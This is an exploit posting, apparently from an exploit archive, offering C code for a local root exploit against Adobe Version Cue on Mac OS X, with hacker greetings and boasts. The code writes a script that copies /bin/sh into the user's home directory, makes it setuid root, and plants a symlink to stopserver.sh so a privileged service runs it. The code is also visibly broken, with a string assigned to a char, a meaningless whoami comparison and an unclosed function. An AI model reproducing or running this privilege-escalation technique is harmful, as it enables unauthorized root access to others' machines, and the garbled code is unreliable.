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Mac OS X - Adobe Version Cue local root exploit [c version exploit]

 [ Mac OS X - Adobe Version Cue local root exploit ]                            
                    c version exploit                                           
                --=== by ActionSpider ===--                                     
                     Iam sun-os hehehe                                          

[http://defacers.com.mx ]                                                
Greetz to: [ Behrooz & Nima  &  Ehsan & str0ke & Status-x  & Mafia_Boy  &  
stealh  ]           
Greetz to: [  and all member of SegmentationFault Group                         
                 Code written By ActionSpider Mac OS X - Adobe Version [C] 
version Exploit;)                                                               

#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>

int main(){
int x =1;
char a= "root";

printf("\t[ Mac OS X - Adobe Version Cue local root exploit ]\n");
printf("\t\t--==Code written By ActionSpider==--\n");
printf("\t\t --=ActionSpider@xxxxxxxxxxxxx=--\n");
printf("\t\t\t[ www.Ashiayne.com ]\n\n\n");

printf("w8 for geting root man...\n");
for (x=1;x<=75;x++){

printf("\nyour id now:");
printf("touch productname.sh...");
system("echo cp /bin/sh /Users/$USER; >> productname.sh");
system("echo chmod 4755 /Users/$USER/sh; >> productname.sh");
system("echo chown root /Users/$USER/sh >> productname.sh");
printf("chmod productname.sh 0755");
system("chmod 0755 ./productname.sh");
printf("ok w8 for touch link...");
system("ln -s $path/stopserver.sh");
printf("exection it :p hehe\n");
printf("ok w8 for see system rooted or not \n\n");

       if (system("whoami") == a)
printf("\n\n ok system now rooted hehe...:P");
printf("sory this server is patch :(\n");